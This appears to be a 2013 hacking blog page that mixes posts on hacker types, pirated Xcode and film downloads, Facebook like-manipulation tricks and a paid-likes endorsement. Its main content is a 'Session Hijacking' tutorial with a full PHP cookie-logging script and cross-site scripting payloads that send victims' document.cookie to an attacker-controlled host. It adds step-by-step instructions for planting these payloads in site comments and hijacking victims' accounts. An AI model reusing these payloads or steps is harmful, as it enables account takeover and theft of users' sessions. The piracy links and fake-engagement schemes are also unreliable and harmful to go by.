Types of Hacker

Let’s see the categories of Hackers on the basis on their knowledge. Coders **The Real Hackers are the Coders, the ones who revise the methods and create tools that are available in the market. Coders can find security holes and weaknesses in software to create their own exploits. These Hackers can use those exploits to develop fully patched and secure systems.

Concept of Ethical Hacking

hi guys this is my first post i hope to present hacking A to Z 101 lets begun :) Hacking The Art of exploring various security breaches is termed as Hacking. # Computer Hackers have been around for so many years. Since the Internet became widely used in the World, We have started to hear more and more about hacking

Why Hackers Hack?

The main reason why Hackers hack is because they can hack. Hacking is a casual hobby for some Hackers — they just hack to see what they can hack and what they can’t hack, usually by testing their own systems. Many Hackers are the guys who get kicked out of corporate and government IT and security organizations. They try to bring down the status of the organization by attacking or stealing information

Steps Performed By hackers

1) Reconnaissance 2) Scanning 3) Gaining Access 4) Maintaining Access 5) Clearing Tracks • Performing Reconnaissance • Scanning and Enumeration • Gaining access • Maintaining access and Placing Backdoors • Covering tracks or Clearing Log

Prevention from Hackers

What can be done to prevent Hackers from finding new holes in software and exploiting them? Information security research teams exist—to try to find these holes and notify vendors before they are exploited. There is a beneficial competition occurring between the Hackers securing systems and the Hackers breaking into those systems. This competition provides us with better and stronger security, as well as more complex and sophisticated attack techniques.

ad

Wednesday, August 28, 2013

Direct Download XCode 4.6 Offline Version

Direct Download Xcode 4.6 Offline Version





Download Links

click and wait 5 second and press skip add
1
2
3
4
5

Mariyaan Tamil Film Full Direct Download

Mariyaan Tamil Film Full Direct Download







  • Maryan
    2013 Film

  • Maryan is a 2013 Indian Tamil drama thriller film directed by Bharat Bala starring Dhanush alongside Parvathi. Produced by Venu Ravichandran, the film has music and background score composed by A. R. Wikipedia


  • Download Free Chennai Express 2013 Film Direct Download

    Download Free Chennai Express 2013 Film




    Chennai Express

  • 2013 Film







  • 6.5/10-IMDb






  • Chennai Express is a 2013 Indian romantic action comedy film directed by Rohit Shetty and produced by Gauri Khan under the banner Red Chillies Entertainment. The film features Shahrukh Khan and Deepika Padukone in lead roles. Wikipedia

  • Monday, August 26, 2013

    Facebook Unlike Imacro


    Hello friends to day im going to little trick to Mass Unlike facebook fan pages.this is very usefull for people who collect points from social exchange sites.
    ok lets get started first go to

    http://www.facebook.com/browse/other_connections_of/

    then download imacro script and add in to your i macro folder located in documents
    now run and enjoy

    Download

    Monday, August 19, 2013

    Session Hijacking




    Post By
    Sameera Madushan Dissanayaka

    Hi guys after long time .this time lets talk about Session Hijacking
    well lets get started.
    In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

    Here we show how you can hack a session using javascript and php.

    What is a cookie?

    A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
    A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
    Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

    What can we do after stealing cookie?

    Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

    This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

    PHP Code:
    <?php

    function GetIP()
    {
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
    $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
    $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
    $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
    $ip = $_SERVER['REMOTE_ADDR'];
    else
    $ip = "unknown";
    return($ip);
    }

    function logData()
    {
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
    fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
    ");
    else
    fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
    }

    logData();

    ?>

    Save the script as a cookielogger.php on your server.
    (You can get any free webhosting easily such as justfree,x10hosting etc..)

    Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

    Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

    The best way is to look for user interactive sites which contain comments or forums.

    Post the following code which invokes or activates the cookielogger on your host.

    Code:
    <script language="Java script">
    document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
    </script>

    Your can also trick the victim into clicking a link that activates javascript.
    Below is the code which has to be posted.

    Code:
    <a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

    Clicking an image also can activate the script.For this purpose you can use the below code.

    Code:
    <a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

    <img src="URL OF THE IMAGE"/></a>

    All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

    In the above codes please remove the space in between javascript.

    Hijacking the Session:

    Now we have cookie,what to do with this..?
    Download cookie editor mozilla plugin or you may find other plugins as well.

    Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

    Friday, August 9, 2013

    Get Unlimited Facebook Like free

    Hello friends today im talk about how to get free facebook like to your fanpages it is simple bot free

    facebook like

    Friday, August 2, 2013

    Got Extram FaceBook Like Bonus


    Hello Friends i got amazing facebook like blast pack from Fiverr Seller.
    i thought she was lying and not providing good likes but Finally i understand i was wrong. i want to get some facebook like to facebook page so i orderd seller promised to give 300+ facebook likes.so i paid 5 $ and orderd gig.i thought she just give 300 likes as other usual sellers in fiverr .i was waiting till my order completed .when finally got massage from seller.actually She is very good professional Social Media Marketer.she provide best service on Fiverr.
    when i ordering there is only 293 i orderd 300 likes but Samantha Anderson she is my best favorite  seller She gave me 300+ facebook likes and bonus 2898 Likes It was amazing.all likes came trough real facebook profile with photos .
    She is very polite and provide best service.if you also like to get her service
    here is her gig 
    here is her profile screen shot
    her profile

    http://fiverr.com/geekjava88



    She make me day happy I like to get this chance to thank you Ms Samantha Anderson.thank you very much